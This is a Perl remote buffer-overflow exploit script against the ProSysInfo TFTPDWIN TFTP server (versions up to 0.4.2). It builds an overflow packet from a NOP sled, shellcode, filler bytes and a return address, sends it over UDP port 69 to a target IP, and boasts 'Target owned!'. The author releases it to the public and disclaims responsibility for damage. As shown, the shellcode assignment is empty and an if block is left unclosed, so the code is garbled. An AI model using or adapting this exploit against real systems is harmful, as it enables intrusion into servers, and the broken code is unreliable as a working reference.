# ProSysInfo TFTP server TFTPDWIN <= 0.4.2
# Universal Remote Buffer Overflow Exploit
# [Works on all Windows versions.]
# ----------------------------------------
# Exploit by SkD (skdrat@hotmail.com)
# Let's take a description from their page at:
# http://www.tftpserver.prosysinfo.com.pl
# "The TFTP Server TFTPDWIN software is a
# multithreaded TFTP protocol server for
# Windows 98/Me/2000/XP/2003. TFTP Server
# TFTPDWIN is compatible with RFC 1350,
# RFC 2347, RFC 2348, and RFC 2349, documents."
# Some of their clients include: CISCO, Alcatel-Lucent,
# Intel, AT&T, Panasonic, Boeing ...
# Wow, all of these companies use this software!
# This is pretty much serious.
# So this is my new exploit and I made it universal like
# the last one. This overflow was pretty much weird at
# first sight, but a bit of looking into the software
# can tell you many things about it!
# If Immunity (www.immunityinc.com) can make a commerical
# exploit for this and keep it for private clients,
# so can I ;) but to the public :). Have fun ladies &
# gents.
# Usage: prosystftpd_exploit.pl <target IP>
# Greets fly to InTeL.
# WARNING: Author has no responsibility over the damage
# you do using this!
use IO::Socket;
use warnings;
use strict;
print "[x] ProSysInfo TFTP server TFTPDWIN <= 0.4.2\n";
print " Universal Remote Buffer Overflow Exploit\n\n";
print "[x] Exploit by SkD (skdrat@ hotmail.com)\n\n";
print "[x] Usage: prosystftpd_exploit.pl <target IP>\n\n";
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=Pex http://metasploit.com
# Restricted chars = 0x00 0x6e 0x65 0x74
my $shellcode =
my $p1="\x00\x01";
my $p2="\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00";
my $ret = "\x5d\x10\x40"; #0040105D -> :) SkD's Tricks
my $nopsled = "\x90" x 10;
my $len = (274 - length($shellcode));
if($len < 0) {
print "[x] Your shellcode is too big! Find another way :)\n";
my $overflow = "\x41" x $len;
my $packet = (($p1).($nopsled).($shellcode).(($overflow)).($ret).($p2));
my $sock = new IO::Socket::INET(Proto=>'udp', PeerAddr=>$ARGV[0], PeerPort=>'69');
die "[x] Cannot Connect!\n" unless $sock;
print "[x] Connected to daemon :)\n";
print "[x] Sending packet..\n";
print $sock $packet;
close $sock;
print "[x] Target owned!\n";